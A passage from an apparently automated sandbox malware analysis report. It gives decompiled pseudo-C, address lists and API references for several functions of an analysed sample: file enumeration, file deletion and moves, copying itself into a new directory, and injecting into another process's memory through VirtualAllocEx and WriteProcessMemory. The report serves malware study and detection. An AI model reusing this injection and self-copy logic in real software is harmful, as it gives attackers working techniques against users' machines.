					_t84 =  &(_t84[1]);
					_t118 = _t77 - 0x1ff;
					_t77 = _t77 + 1;
				} while (_t118 <= 0 && _t98 != 0);
				_t90 = _t98 & 0x0000ffff;
				if(_t90 == 0x5c) {
					L9:
					_t68 = 2;
					L10:
					_t78 = _t77 - 1;
					if(_t68 > 0 || _t90 == 0x2e) {
						L16:
						_t91 = _t78;
						goto L17;
					} else {
						_t100 =  &(_t84[_t68]);
						_t93 = _t78;
						while(_t84 > _t100) {
							_t69 =  *_t84 & 0x0000ffff;
							_t93 = _t93 - 1;
							_t84 =  &(_t84[0xffffffffffffffff]);
							if(_t69 != 0x2e) {
								continue;
							}
							L17:
							_t60 =  &(_t108[4]);
							 *_t60 = 0;
							if(_t91 <= 0) {
								goto L23;
							}
							_t85 =  &(_t102[_t91]);
							_t108[4] = _t34;
							_t83 = (_t85 +  !_t102 >> 1) + 1;
							if(_t91 == 1) {
								L21:
								_t35 = _t108 + 0x10 + _t83 * 2;
								goto L24;
							}
							_t99 =  &(_t108[4]);
							_t59 =  &(_t102[1]);
							do {
								_t92 =  *_t59 & 0x0000ffff;
								_t59 =  &(_t59[1]);
								 *_t99 = _t92;
								_t99 =  &(_t99[0]);
							} while (_t59 < _t85);
							goto L21;
						}
						goto L16;
					}
				}
				_t101 = _t84;
				while(1) {
					_t68 = 0;
					if(_t101 <= _t102) {
						goto L10;
					}
					_t106 =  *_t101 & 0x0000ffff;
					_t101 =  &(_t101[0xffffffffffffffff]);
					_t102 =  *_t108;
					if(_t106 != 0x5c) {
						continue;
					}
					goto L9;
				}
				goto L10;
			}

0x005d05ca
0x005d05cc
0x005d05d0
0x005d05da
0x005d05df
0x005d05e4
0x005d0889
0x005d0895
0x005d0895
0x005d05ea
0x005d05ec
0x005d05ef
0x005d05f5
0x005d06a0
0x005d06a4
0x005d06aa
0x005d06aa
0x005d06ac
0x005d06ac
0x005d06b2
0x005d06b9
0x005d06c1
0x005d06c6
0x005d06cb
0x005d06ce
0x005d06ce
0x005d06d8
0x005d06e3
0x005d06e8
0x005d06ed
0x005d0711
0x005d071d
0x005d071f
0x005d0727
0x005d0729
0x005d072d
0x00000000
0x00000000
0x005d0734
0x005d0736
0x005d073a
0x00000000
0x00000000
0x005d073c
0x005d0742
0x005d0747
0x005d074d
0x005d0751
0x005d0756
0x005d075b
0x00000000
0x00000000
0x00000000
0x00000000
0x005d075b
0x005d0740
0x00000000
0x005d06ef
0x005d06fb
0x005d06fd
0x005d0709
0x005d070b
0x005d070f
0x00000000
0x00000000
0x00000000
0x005d070f
0x005d0769
0x005d0778
0x005d077d
0x005d0782
0x005d080f
0x005d0810
0x005d0815
0x005d081a
0x005d081d
0x005d081d
0x005d0823
0x005d0829
0x005d0842
0x005d084e
0x005d0850
0x005d0852
0x005d0864
0x005d0866
0x005d086a
0x00000000
0x00000000
0x00000000
0x005d086a
0x005d086c
0x005d086c
0x00000000
0x005d082b
0x005d082b
0x005d0831
0x00000000
0x00000000
0x005d0836
0x005d083b
0x005d083e
0x005d086f
0x005d0870
0x005d0878
0x005d087e
0x005d0881
0x005d0886
0x00000000
0x005d087e
0x005d0829
0x005d078d
0x005d0794
0x005d0799
0x005d079e
0x00000000
0x00000000
0x005d07a0
0x005d07a9
0x005d07b5
0x005d07cb
0x005d07d3
0x005d07d8
0x005d07d9
0x005d07ea
0x005d07f4
0x005d07f6
0x005d07fa
0x00000000
0x00000000
0x005d07fc
0x005d07fe
0x005d0803
0x005d0808
0x00000000
0x00000000
0x005d080c
0x00000000
0x005d080c
0x00000000
0x005d07d9
0x005d07bf
0x005d07c4
0x005d07c9
0x00000000
0x00000000
0x00000000
0x005d07c9
0x005d06ed
0x005d05fd
0x005d05fd
0x005d0600
0x005d0601
0x005d0601
0x005d0605
0x005d0608
0x005d060e
0x005d060e
0x005d061a
0x005d0621
0x005d0638
0x005d0638
0x005d0639
0x005d0639
0x005d063c
0x005d065a
0x005d065a
0x00000000
0x005d0643
0x005d0643
0x005d0646
0x005d0648
0x005d064c
0x005d064f
0x005d0650
0x005d0656
0x00000000
0x00000000
0x005d065c
0x005d065c
0x005d0662
0x005d0668
0x00000000
0x00000000
0x005d066c
0x005d0670
0x005d067b
0x005d067f
0x005d069a
0x005d069a
0x00000000
0x005d069a
0x005d0683
0x005d0687
0x005d068a
0x005d068a
0x005d068d
0x005d0690
0x005d0693
0x005d0696
0x00000000
0x005d068a
0x00000000
0x005d0648
0x005d063c
0x005d0623
0x005d0625
0x005d0625
0x005d0628
0x00000000
0x00000000
0x005d062a
0x005d062d
0x005d0633
0x005d0636
0x00000000
0x00000000
0x00000000
0x005d0636
0x00000000

APIs

DeleteFileW.KERNEL32(?), ref: 005D06CE
DeleteFileW.KERNEL32(00000000), ref: 005D06FE
Sleep.KERNEL32(000003E8), ref: 005D0709
MoveFileW.KERNEL32(?,?), ref: 005D0727
Sleep.KERNEL32(000003E8), ref: 005D0734
Sleep.KERNEL32(000003E8), ref: 005D0747
Sleep.KERNEL32(0000EA60), ref: 005D078D
Sleep.KERNEL32(0000EA60), ref: 005D07F4
DeleteFileW.KERNEL32(757C70D6), ref: 005D081D
MoveFileW.KERNEL32(?), ref: 005D0859
Sleep.KERNEL32(000003E8), ref: 005D0864

Strings

\, xrefs: 005D0630

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Sleep$File$Delete$Move
String ID: \
API String ID: 3992264990-2967466578
Opcode ID: 31af432dd532d8238786613d86a0ddd1c602e08dbe10a6e575e2abbd2b5a4c7c
Instruction ID: b8de155cd5e759483cc59faa144296b417d38111d191356921b0203339d8d95d
Opcode Fuzzy Hash: 31af432dd532d8238786613d86a0ddd1c602e08dbe10a6e575e2abbd2b5a4c7c
Instruction Fuzzy Hash: 4371E1756043059FDB306B69DC85B2E7BA9FFC0300F05542BE99A873E2EA30D814D792

Uniqueness

Uniqueness Score: -1.00%

Function 005D3FA0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
injectionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005D3FA0() {
				int _t43;
				void* _t45;
				void* _t46;
				int _t48;
				long* _t59;
				intOrPtr* _t62;
				long _t63;
				long _t64;
				long _t68;
				long _t74;
				long _t76;
				void* _t81;
				void* _t88;
				DWORD* _t89;
				long _t90;
				long _t92;
				signed int _t94;
				long _t95;
				void* _t96;
				void* _t97;
				DWORD* _t98;
				DWORD* _t99;

				_t89 = _t98;
				 *_t89 = 0;
				_t43 = ReadProcessMemory( *(_t98[0x24] + 0x70),  *(_t98[0x24] + 0x94),  &(_t98[3]), 0x70, _t89);
				_t63 = 0;
				if(_t43 == 0 ||  *_t98 != 0x70) {
					L22:
					return _t63;
				} else {
					_t94 = _t98[0x26];
					_t90 = 8 + _t94 * 4;
					_t45 = E005C3180(_t90, 0);
					_t99 =  &(_t98[2]);
					if(_t45 == 0) {
						goto L22;
					}
					_t88 = _t45;
					_t68 =  &(_t99[0x28]);
					 *(_t88 + 4) = _t94;
					 *_t88 = _t99[0x25];
					_t99[1] = _t68;
					_t64 =  *(_t68 - 4);
					if(_t94 == 0) {
						L7:
						_t95 = _t99[0x28];
						_t46 = VirtualAllocEx( *(_t95 + 0x70), 0, _t90, 0x3000, 0x40);
						if(_t46 == 0) {
							_t63 = 0;
							L21:
							E005C91E0(_t88);
							goto L22;
						}
						_t99[2] = _t64;
						 *_t99 = 0;
						_t96 = _t46;
						_t48 = WriteProcessMemory( *(_t95 + 0x70), _t46, _t88, _t90, _t99);
						_t63 = 0;
						if(_t48 == 0) {
							L18:
							_t81 = _t96;
							L19:
							VirtualFreeEx( *(_t99[0x27] + 0x70), _t81, 0, 0x8000);
							goto L21;
						}
						_t81 = _t96;
						if( *_t99 != _t90) {
							goto L19;
						}
						_t63 = 0;
						_t99[0xe] = 1;
						_t99[0xf] = _t81;
						_t99[0x17] = 0;
						 *_t99 = 0;
						if(WriteProcessMemory( *(_t99[0x24] + 0x70),  *(_t99[0x24] + 0x94),  &(_t99[5]), 0x70, _t99) == 0 ||  *_t99 != 0x70) {
							goto L18;
						} else {
							_t92 = _t99[0x24];
							if(E005CB710(ResetEvent( *(_t92 + 0x88)), _t92) == 0) {
								goto L18;
							}
							 *_t99 = 0;
							if(ReadProcessMemory( *(_t92 + 0x70),  *(_t92 + 0x94),  &(_t99[5]), 0x70, _t99) == 0) {
								goto L18;
							}
							_t81 = _t96;
							if( *_t99 == 0x70 && _t99[0x18] != 0) {
								_t74 = _t99[2];
								_t63 = 1;
								if(_t74 != 0) {
									 *_t74 = _t99[0x17];
								}
							}
							goto L19;
						}
					}
					_t59 =  &(_t99[0x27]);
					_t99[1] =  &(_t59[2]);
					 *(_t88 + 8) = _t59[1];
					if(_t94 != 1) {
						_t97 = _t94 - 1;
						_t62 = _t88 + 0xc;
						do {
							_t76 = _t99[1];
							_t99[1] = _t76 + 4;
							 *_t62 =  *_t76;
							_t62 = _t62 + 4;
							_t97 = _t97 - 1;
						} while (_t97 != 0);
					}
					goto L7;
				}
			}

0x005d3fae
0x005d3fc2
0x005d3fcd
0x005d3fd3
0x005d3fd7
0x005d4188
0x005d4191
0x005d3fe7
0x005d3fe7
0x005d3fee
0x005d3ff8
0x005d3ffd
0x005d4002
0x00000000
0x00000000
0x005d400f
0x005d4011
0x005d401a
0x005d401d
0x005d401f
0x005d4023
0x005d4026
0x005d405c
0x005d4066
0x005d4070
0x005d4078
0x005d417d
0x005d417f
0x005d4180
0x00000000
0x005d4185
0x005d4083
0x005d4087
0x005d4091
0x005d4095
0x005d409b
0x005d409f
0x005d4161
0x005d4161
0x005d4163
0x005d4175
0x00000000
0x005d4175
0x005d40a8
0x005d40aa
0x00000000
0x00000000
0x005d40b7
0x005d40b9
0x005d40c1
0x005d40cc
0x005d40db
0x005d40ef
0x00000000
0x005d40f7
0x005d40f7
0x005d4113
0x00000000
0x00000000
0x005d4120
0x005d413d
0x00000000
0x00000000
0x005d4143
0x005d4145
0x005d414e
0x005d4154
0x005d4157
0x005d415d
0x005d415d
0x005d4157
0x00000000
0x005d4145
0x005d40ef
0x005d4028
0x005d4035
0x005d403c
0x005d403f
0x005d4043
0x005d4044
0x005d4047
0x005d4047
0x005d404e
0x005d4054
0x005d4056
0x005d4059
0x005d4059
0x005d4047
0x00000000
0x005d403f

APIs

ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095
WriteProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D40E7
ResetEvent.KERNEL32(?), ref: 005D4104
ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D4135
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?,00003000,00000040), ref: 005D4175

Strings

p, xrefs: 005D40F1
p, xrefs: 005D413F
p, xrefs: 005D3FDD

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process$Memory$HeapReadVirtualWrite$AllocAllocateEventFreeReset
String ID: p$p$p
API String ID: 569134547-3854358385
Opcode ID: e2f170d7ad36297e4048146f472a912fd19945279644c923a4ccc6405510070c
Instruction ID: 700cd6ff9bfb29502ce1f19f1d59e04ae379d79a6f662e3e91a92e1359af7c50
Opcode Fuzzy Hash: e2f170d7ad36297e4048146f472a912fd19945279644c923a4ccc6405510070c
Instruction Fuzzy Hash: 3A512970604305AFD7309F69C888B6BBBE9FB94744F15852EE9898B360D770EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005CD4B0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E005CD4B0() {
				long _t50;
				signed int _t54;
				signed int _t55;
				void* _t57;
				void* _t61;
				void _t64;
				long _t70;
				void _t72;
				signed int _t73;
				void** _t75;
				signed int _t76;
				void* _t77;
				WCHAR* _t79;
				void* _t81;
				void* _t82;
				signed int _t83;
				WCHAR* _t84;
				signed int _t85;
				void** _t87;
				void** _t89;

				_t77 = _t87[0x151];
				_t84 =  &(_t87[0x34]);
				_t50 = GetFullPathNameW(_t87[0x153], 0x105, _t84, 0);
				_t81 = 0;
				if(_t50 == 0) {
					L23:
					E005C91E0(_t81);
					_t72 = 0;
					_t82 = 0;
				} else {
					PathAddBackslashW(_t84);
					_t73 = 0xfffffefb;
					while( *((short*)(_t87 + 0x2dc + _t73 * 2)) != 0) {
						_t73 = _t73 + 1;
						if(_t73 != 0) {
							continue;
						} else {
							L22:
							_t81 = 0;
							goto L23;
						}
						goto L24;
					}
					_t54 = 0xfffffefb;
					_t87[2] = 0x2e002a;
					_t87[3] = 0x2a;
					while( *((short*)(_t87 + 0x2dc + _t54 * 2)) != 0) {
						_t54 = _t54 + 1;
						if(_t54 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L24;
					}
					_t75 =  &(_t87[2]);
					_t55 = _t54 + 1;
					_t83 = 0x2a;
					while(1) {
						_t76 = _t55;
						 *(_t87 + 0x2da + _t55 * 2) = _t83;
						if(_t55 == 0) {
							break;
						}
						_t83 =  *_t75 & 0x0000ffff;
						_t75 =  &(_t75[0]);
						_t16 = _t76 + 1; // 0xfffffefd
						_t55 = _t16;
						if(_t83 != 0) {
							continue;
						} else {
							 *((short*)(_t87 + 0x2dc + _t76 * 2)) = 0;
							_t57 = FindFirstFileW(_t84,  &(_t87[0xb7]));
							_t81 = 0;
							 *_t87 = _t57;
							if(_t57 == 0xffffffff) {
								goto L23;
							} else {
								 *((short*)(_t87 + 0x2dc + _t73 * 2)) = 0;
								_t82 = 0;
								_t87[1] = 0;
								do {
									if((_t87[0xb7].dwFileAttributes & 0x00000010) != 0) {
										goto L18;
									} else {
										_t79 = _t84;
										_t85 = 1;
										_t61 = E005C3180(4, _t87[1]);
										_t87 =  &(_t87[2]);
										_t81 = _t61;
										if(_t61 == 0) {
											L25:
											FindClose( *_t87);
											_t77 = _t87[0x151];
											L26:
											if(_t85 != 0) {
												do {
													E005C91E0( *((intOrPtr*)(_t81 + _t85 * 4 - 4)));
													_t87 =  &(_t87[1]);
													_t85 = _t85 - 1;
												} while (_t85 != 0);
											}
											goto L23;
											L29:
										} else {
											_t64 = E005C3180(0x208, 0);
											_t87 =  &(_t87[2]);
											 *_t81 = _t64;
											if(_t64 == 0) {
												goto L25;
											} else {
												E005D4520( &(_t87[3]), 0x23);
												_t89 =  &(_t87[2]);
												_push( &(_t89[0xc2]));
												E005D68E0( *_t81, 0x105,  &(_t89[4]), _t79);
												_t87 =  &(_t89[5]);
												_t72 = _t85;
												_t84 = _t79;
												_t87[1] = _t81;
												goto L18;
											}
										}
									}
									goto L24;
									L18:
								} while (FindNextFileW(_t87[1],  &(_t87[0xb7])) != 0);
								_t70 = GetLastError();
								FindClose( *_t87);
								_t77 = _t87[0x151];
								_t85 = _t72;
								if(_t70 != 0x12) {
									goto L26;
								}
							}
						}
						goto L24;
					}
					 *((short*)(_t87 + 0x2da + _t76 * 2)) = 0;
					goto L22;
				}
				L24:
				 *_t77 = _t72;
				return _t82;
				goto L29;
			}

0x005cd4ba
0x005cd4c1
0x005cd4d7
0x005cd4df
0x005cd4e4
0x005cd665
0x005cd666
0x005cd66e
0x005cd670
0x005cd4ea
0x005cd4eb
0x005cd4f1
0x005cd4f6
0x005cd501
0x005cd502
0x00000000
0x005cd504
0x005cd663
0x005cd663
0x00000000
0x005cd663
0x00000000
0x005cd502
0x005cd509
0x005cd50e
0x005cd516
0x005cd51e
0x005cd529
0x005cd52a
0x00000000
0x005cd52c
0x00000000
0x005cd52c
0x00000000
0x005cd52a
0x005cd531
0x005cd535
0x005cd536
0x005cd53a
0x005cd53a
0x005cd53e
0x005cd546
0x00000000
0x00000000
0x005cd54c
0x005cd54f
0x005cd552
0x005cd552
0x005cd558
0x00000000
0x005cd55a
0x005cd561
0x005cd56d
0x005cd576
0x005cd57b
0x005cd57e
0x00000000
0x005cd584
0x005cd58a
0x005cd596
0x005cd598
0x005cd5a0
0x005cd5a8
0x00000000
0x005cd5aa
0x005cd5aa
0x005cd5ac
0x005cd5bb
0x005cd5c0
0x005cd5c3
0x005cd5c7
0x005cd681
0x005cd684
0x005cd68a
0x005cd691
0x005cd693
0x005cd695
0x005cd699
0x005cd69e
0x005cd6a1
0x005cd6a1
0x005cd6a4
0x00000000
0x00000000
0x005cd5cd
0x005cd5d4
0x005cd5d9
0x005cd5de
0x005cd5e1
0x00000000
0x005cd5e7
0x005cd5ee
0x005cd5f3
0x005cd5fd
0x005cd60c
0x005cd611
0x005cd614
0x005cd616
0x005cd61e
0x00000000
0x005cd61e
0x005cd5e1
0x005cd5c7
0x00000000
0x005cd622
0x005cd630
0x005cd638
0x005cd643
0x005cd649
0x005cd653
0x005cd655
0x00000000
0x005cd657
0x005cd655
0x005cd57e
0x00000000
0x005cd558
0x005cd659
0x00000000
0x005cd659
0x005cd672
0x005cd672
0x005cd680
0x00000000

APIs

GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005CD4D7
PathAddBackslashW.SHLWAPI(?), ref: 005CD4EB
FindFirstFileW.KERNEL32(?,00000000), ref: 005CD56D
FindNextFileW.KERNEL32(00000000,00000010), ref: 005CD62E
GetLastError.KERNEL32 ref: 005CD638
FindClose.KERNEL32 ref: 005CD643
FindClose.KERNEL32 ref: 005CD684

Strings

*, xrefs: 005CD50E
*, xrefs: 005CD516

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Find$CloseFilePath$BackslashErrorFirstFullLastNameNext
String ID: *$*
API String ID: 1945327101-3771216468
Opcode ID: 2044aee47ba0e31ed32f1160117e5a6fe41a6145609d3f0922eadb5a69cd434f
Instruction ID: 6d52b9ac3414b97ca40a9e251bb8ac95012188f33d3c9afaac67011031a2696b
Opcode Fuzzy Hash: 2044aee47ba0e31ed32f1160117e5a6fe41a6145609d3f0922eadb5a69cd434f
Instruction Fuzzy Hash: 9A419D715043059FD730AFA4EC49F9BBBA9BF84308F14493EE889D72A1E7719854CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005C3EC0, Relevance: 15.3, APIs: 10, Instructions: 343
filestringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E005C3EC0(void* __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t82;
				intOrPtr _t83;
				WCHAR* _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t87;
				WCHAR* _t94;
				void* _t96;
				signed int _t99;
				signed short* _t106;
				int* _t107;
				signed short* _t109;
				signed short* _t110;
				signed short* _t113;
				intOrPtr _t122;
				signed int _t125;
				WCHAR* _t132;
				short* _t133;
				WCHAR* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				signed int _t140;
				signed short** _t141;
				void* _t143;
				void* _t144;
				signed short* _t149;
				signed short _t150;
				signed int _t157;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t169;
				WCHAR* _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr _t174;
				signed int* _t175;
				void* _t177;
				void* _t178;
				void* _t179;
				WCHAR** _t183;
				signed short* _t184;
				signed short** _t185;
				void* _t186;
				void* _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				void* _t190;
				void* _t191;
				intOrPtr* _t192;
				void* _t193;
				short _t218;

				_t169 =  *((intOrPtr*)(_t186 + 0x464));
				_t137 = _t186 + 0x18;
				_t171 = 0;
				 *((intOrPtr*)(_t186 + 0xc)) = 0;
				 *((intOrPtr*)(_t186 + 4)) = 0;
				 *((intOrPtr*)(_t186 + 0x14)) = 0;
				E005D43C0(_t137, __edx, __eflags);
				if(_t169 == 0) {
					L3:
					_t172 = _t186 + 4;
					E005CAE30(_t172, _t186 + 8);
					_t187 = _t186 + 8;
					_t82 =  *_t172;
				} else {
					while( *((short*)(_t169 + _t171 * 2)) != 0) {
						_t171 = _t171 + 1;
						if(_t171 != 0x800) {
							continue;
						} else {
							goto L3;
						}
						goto L5;
					}
					_t82 = E005CB7A0(_t169);
					_t187 = _t186 + 4;
					 *((intOrPtr*)(_t187 + 4)) = _t82;
					 *(_t187 + 8) = _t171;
				}
				L5:
				_t83 = E005CB7A0(_t82);
				_t188 = _t187 + 4;
				_t173 =  *(_t188 + 8);
				 *_t188 = _t83;
				_t184 = _t83 + _t173 * 2;
				_t84 = E005CB7A0( *((intOrPtr*)(_t188 + 4)));
				_t189 = _t188 + 4;
				_t170 = _t84;
				if(_t173 <= 0) {
					_t174 =  *_t189;
				} else {
					_t174 =  *_t189;
					while(( *_t184 & 0x0000ffff) != 0x5c) {
						_t184 =  &(_t184[0xffffffffffffffff]);
						if(_t184 > _t174) {
							continue;
						} else {
						}
						goto L12;
					}
					 *_t184 = 0;
					_t184 =  &(_t184[1]);
					__eflags = _t184;
				}
				L12:
				_t85 = E005CB7A0(_t174);
				_t190 = _t189 + 4;
				 *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x468)))) = _t85;
				_t86 = E005CB7A0( *((intOrPtr*)(_t190 + 4)));
				_t191 = _t190 + 4;
				_t147 =  *((intOrPtr*)(_t191 + 0x46c));
				 *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x46c)))) = _t86;
				_push(_t137);
				_push(_t174);
				_t87 = E005CC7C0();
				_t192 = _t191 + 8;
				_t138 = 0;
				if(_t87 == 0) {
					if( *0x5d9ae8 == 0) {
						_t94 =  *(_t192 + 0xc);
					} else {
						_t183 = _t192 + 0xc;
						_push(_t183);
						E005C8CD0(_t147);
						_t192 = _t192 + 4;
						_t94 =  *_t183;
						if(_t94 != 0) {
							_t174 =  *_t192;
						} else {
							_t174 =  *_t192;
							if( *((intOrPtr*)(_t192 + 8)) != 0) {
								_t159 =  *_t170 & 0x0000ffff;
								_t132 = _t170;
								if(_t159 != 0) {
									_t135 = _t170;
									do {
										if((_t159 - 0x00000041 & 0x0000ffff) <= 0x19) {
											 *_t135 = _t159 + 0x20;
										}
										_t159 = _t135[1] & 0x0000ffff;
										_t135 =  &(_t135[1]);
									} while (_t159 != 0);
								}
								_t133 =  &(_t132[0xfffffffffffffffa]);
								while(_t133 > _t170) {
									__eflags =  *_t133 - 0x790073;
									if( *_t133 != 0x790073) {
										L25:
										_t133 =  &(_t133[0xffffffffffffffff]);
										__eflags = _t133;
										continue;
									} else {
										__eflags = _t133[2] - 0x740073;
										if(_t133[2] != 0x740073) {
											goto L25;
										} else {
											__eflags = _t133[4] - 0x6d0065;
											if(_t133[4] == 0x6d0065) {
												L28:
												 *(_t192 + 0xc) = 0xffffffff;
												_t94 = 0xffffffffffffffff;
											} else {
												goto L25;
											}
										}
									}
									goto L31;
								}
								_t94 = 0;
								if( *((intOrPtr*)(_t192 + 8)) <= 0x11) {
									goto L28;
								}
							}
						}
					}
					L31:
					_t162 =  *0x5d9de4;
					_t149 = 0;
					_t139 = _t192 + 0x40;
					 *(_t192 + 0x10) = 0;
					while(1) {
						L33:
						_push(_t139);
						_push(_t149);
						_push(_t94);
						_push(0x1a);
						_push(_t149);
						if( *_t162() >= 0) {
							goto L35;
						}
						_t138 = 0;
						_push(_t192 + 0x40);
						_push(0);
						_push(0xffffffff);
						_push(0x1a);
						_push(0);
						if( *0x5d9de4() >= 0) {
							goto L35;
						}
						goto L74;
						L35:
						_t96 =  *(_t192 + 0xc);
						if(_t96 != 0) {
							CloseHandle(_t96);
						}
						if( *(_t192 + 0x40) == 0) {
							_t140 = 0;
							__eflags = 0;
							_t175 = _t192 + 0x40;
						} else {
							_t144 = 0;
							_t178 = _t192 + 0x40;
							do {
								_t144 = _t144 + 1;
								_t218 =  *((short*)(_t178 + 2));
								_t178 = _t178 + 2;
							} while (_t218 != 0);
						}
						if(_t140 >=  *((intOrPtr*)(_t192 + 8))) {
							L44:
							E005D4520(_t192 + 0x24c, 0x4d);
							_t193 = _t192 + 8;
							_t99 =  *(_t193 + 0x248) & 0x0000ffff;
							 *_t175 = _t99;
							if(_t99 != 0) {
								_t125 = 0;
								do {
									_t157 =  *(_t193 + 0x24a + _t125 * 2) & 0x0000ffff;
									 *(_t175 + 2 + _t125 * 2) = _t157;
									_t125 = _t125 + 1;
								} while (_t157 != 0);
								_t140 = _t140 + _t125;
							}
							CreateDirectoryW(_t193 + 0x44, 0);
							_t170 = E005C3180(_t140 + _t140 + 0x208, _t170);
							E005CC400(_t170, _t193 + 0x44, _t140 + _t140 + 2);
							_t192 = _t193 + 0x14;
							_t58 = _t140 * 2; // 0xa
							_t106 = _t170 + _t58 + 0xa;
							 *((intOrPtr*)(_t106 - 0xa)) = 0x5c;
							while(1) {
								_t150 =  *_t184 & 0x0000ffff;
								if(_t150 == 0) {
									break;
								}
								if((_t150 & 0x0000ffff) != 0x2e) {
									_t143 = _t150 + 2;
									__eflags = (_t150 - 0x00000049 & 0x0000ffff) - 0xe;
									_t154 =  <  ? _t143 : _t150;
									__eflags = (_t150 - 0x00000035 & 0x0000ffff) - 3;
									_t155 =  <  ? _t143 :  <  ? _t143 : _t150;
									__eflags = (_t150 - 0x0000006b & 0x0000ffff) - 9;
									_t156 =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
									_t184 =  &(_t184[1]);
									 *((short*)(_t106 - 8)) =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
									_t106 =  &(_t106[1]);
									__eflags = _t106;
									continue;
								} else {
									 *((intOrPtr*)(_t106 - 8)) = 0x65002e;
									 *((intOrPtr*)(_t106 - 4)) = 0x650078;
								}
								L54:
								_t177 = 0xfffffffd;
								_t139 = _t192 + 0x40;
								 *_t107 = 0;
								while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
									SleepEx(0x3e8, 0);
									_t177 = _t177 + 1;
									if(_t177 != 0) {
										continue;
									} else {
										if( *((intOrPtr*)( *0x5d9c88)) == 0) {
											L67:
											if( *(_t192 + 0x10) == 0) {
												_t174 =  *_t192;
												_t162 =  *0x5d9de4;
												 *(_t192 + 0xc) = 0xffffffff;
												_t94 = 0xffffffffffffffff;
												 *(_t192 + 0x10) = 1;
												_t149 = 0;
												__eflags = 0;
												goto L33;
											} else {
												goto L68;
											}
										} else {
											_push(_t192 + 0x14);
											if( *0x5d9c88() == 0) {
												goto L67;
											} else {
												_t179 = 3;
												while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
													SleepEx(0x3e8, 0);
													_t179 = _t179 - 1;
													if(_t179 != 0) {
														continue;
													} else {
														_t179 = 0;
													}
													break;
												}
												_t122 =  *((intOrPtr*)(_t192 + 0x14));
												if(_t122 != 0 &&  *((intOrPtr*)( *0x5d9c78)) != 0) {
													 *0x5d9c78(_t122);
												}
												if(_t179 != 0) {
													break;
												} else {
													goto L67;
												}
											}
										}
									}
									goto L74;
								}
								_t185 =  *(_t192 + 0x468);
								_t109 =  *_t185;
								__eflags = _t109;
								if(_t109 != 0) {
									E005C91E0(_t109);
									_t192 = _t192 + 4;
								}
								_t141 =  *(_t192 + 0x46c);
								_t174 =  *_t192;
								_t110 =  *_t141;
								__eflags = _t110;
								if(_t110 != 0) {
									E005C91E0(_t110);
									_t192 = _t192 + 4;
								}
								 *_t185 = E005CB7A0(_t192 + 0x40);
								_t113 = E005CB7A0(_t170);
								_t192 = _t192 + 8;
								 *_t141 = _t113;
								_t138 = 1;
								__eflags = 1;
								goto L74;
							}
							_t107 =  &(_t106[0xfffffffffffffffc]);
							__eflags = _t107;
							goto L54;
						} else {
							_t170[_t140] = 0;
							if(lstrcmpiW(_t170, _t192 + 0x40) == 0) {
								L68:
								_t174 =  *_t192;
								_t138 = 0;
							} else {
								goto L44;
							}
						}
						goto L74;
					}
				}
				L74:
				_t88 =  *((intOrPtr*)(_t192 + 4));
				if( *((intOrPtr*)(_t192 + 4)) != 0) {
					E005C91E0(_t88);
					_t192 = _t192 + 4;
				}
				if(_t174 != 0) {
					E005C91E0(_t174);
					_t192 = _t192 + 4;
				}
				if(_t170 != 0) {
					E005C91E0(_t170);
					_t192 = _t192 + 4;
				}
				E005D16C0(_t192 + 0x18, _t170);
				return _t138;
			}

0x005c3eca
0x005c3ed1
0x005c3ed5
0x005c3ed9
0x005c3edd
0x005c3ee1
0x005c3ee5
0x005c3eec
0x005c3efe
0x005c3f02
0x005c3f08
